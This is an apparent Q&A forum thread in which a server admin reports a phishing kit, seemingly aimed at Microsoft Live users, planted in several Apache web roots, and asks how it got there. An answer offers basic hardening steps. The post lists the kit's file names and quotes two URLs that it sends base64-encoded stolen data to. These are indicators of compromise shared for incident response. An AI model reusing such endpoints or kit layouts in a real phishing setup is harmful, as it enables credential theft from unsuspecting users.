0

Possible Duplicate:
My server’s been hacked EMERGENCY

Earlier today I found a lot of weird files on one of my servers (running Ubuntu Server 10.04), which I can't understand how they got there. Probably some sort of XSS-injection, need to dig further in my applications.

What I found; Multiple directories in the web roots of several domains, with short names ("wesz", "aog0", "uioolz", ...) containing the exact same files and file structures. Google doesn't tell me anything about these files or directories, so I put them here. It looks like a landing page for some MITM against Microsoft Live and it's users.

File structure:

- uioolz (or similar short named directory)
    dataz.php
    index.php
    go.php
    smart.php
    - fll
        <HTML, CSS & JS files for MITM>

Does anyone recognize them and/or can tell me how they could appear in my webroots?

I've run multiple tools to check for root kits, digging in logs, bash histories, etc, but I can't find anything that indicate that the attackers had a shell (or they are really good at hiding it). The found directories and files also had the apache user as owner and group, which may indicate that they were uploaded through an injection attack. However, that I found the exact same files and directories in multiple web roots, domains that have nothing in common, still bugs me. This may indicate that they actually got a shell... But not all of the domains on the server was attacked, only a small subset.

How can I proceed? At the moment I have no chance of do a clean install, but it will be done.

Are there any useful tools that can check for XSS or other types of injection vulns?

I can also add that the intruders files seems to send information to two external domains (specifically to a gta.php);

http://colorpop.com/wp-content/plugins/mailchimp/gta.php?info=<BASE64-INFO>
http://oderena.lt/gta.php?info=<BASE64-INFO>

Domains registered via a proxy registrar.

anon
  • 11
  • 3

1 Answers1

1
  • make sure that your apache directory (document tree of the web-server) is not writable
  • check your apache logs for suspicious GET/POST requests (you can grep those names)
  • check your ftp logs for suspicious requests (you can grep those names)
  • make sure that your software is up to date
  • if you use any third party software contact their support
  • you might check out those tools: Top 125 Network Security Tools
FINESEC
  • 1,371
  • 7
  • 8
  • Thanks for the reply, but I've checked the logs for apache and can't find any intrusions, or attempts, that way. No FTP server. Software is up to date (updating once a week). No third party software (only from repo). Some apache directories need to be writable, for some of the apps. Thanks for the list, will check it out. – anon Nov 09 '12 at 13:45